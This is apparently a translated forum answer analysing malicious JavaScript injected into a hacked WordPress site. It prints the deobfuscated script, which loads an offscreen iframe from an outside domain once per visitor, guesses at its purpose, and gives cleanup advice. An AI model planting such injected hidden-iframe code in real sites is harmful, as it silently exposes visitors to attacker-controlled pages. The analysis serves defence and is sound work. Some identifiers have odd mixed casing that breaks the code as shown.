这是纯粹的信息.当它被去混淆时,您的恶意软件看起来像这样：

function k09() {
     VAR static = 'ajax';
     var controller = 'index.PHP';
     var k = document.createElement('iframe');

     k.src = 'http://DOStojewskij-gesellschaft.de/VD49Jdzr.PHP';
     k.style.position = 'absolute';
     k.style.color = '512';
     k.style.height = '512px';
     k.style.width = '512px';
     k.style.left = '1000512';
     k.style.top = '1000512';

     if (!document.getElementById('k')) {
         document.write('<p id=\'k\' class=\'k09\' ></p>');
         document.getElementById('k').apPEndChild(k);
     }
 }

 function SetCookie(cookieName,cookieValue,nDays,path) {
     var today = new Date();
     var expire = new Date();
     if (nDays == null || nDays == 0) nDays = 1;
     expire.setTime(today.getTime() + 3600000 * 24 * nDays);
     document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
 }

 function GetCookie(name) {
     var start = document.cookie.indexOf(name + "=");
     var len = start + name.length + 1;
     if ((!start) &&
         (name != document.cookie.substring(0,name.length))) {
         return null;
     }
     if (start == -1) return null;
     var end = document.cookie.indexOf(";",len);
     if (end == -1) end = document.cookie.length;
     return unescape(document.cookie.substring(len,end));
 }
 if (navigator.cookieEnabled) {
     if (GetCookie('visited_uq') == 55) {} else {
         SetCookie('visited_uq','55','1','/');

         k09();
     }
 }

http://dostojewskij-gesellschaft.de/VD49Jdzr.PHP只输出“OK”.

为什么？

我的猜测是这是一个IP /流量记录器.也许黑客可以检查哪些博客最活跃,然后又回来破解那个特定网站(不需要浪费时间在每月有2位访问者的网站上).这是好事还是坏事.

好的部分是它们似乎没有使用任何用户数据库或其他任何东西.

糟糕的是,他们很可能已经下载了整个数据库,因为他们显然已经在您的服务器上拥有执行权限,并且可能已将他们的PHP文件放在您的服务器上.你最好的选择是从一个新的WP开始,一个一个地复制插件/主题,同时手动检查它们.

更改所有密码.甚至你的数据库登录.考虑妥协的一切.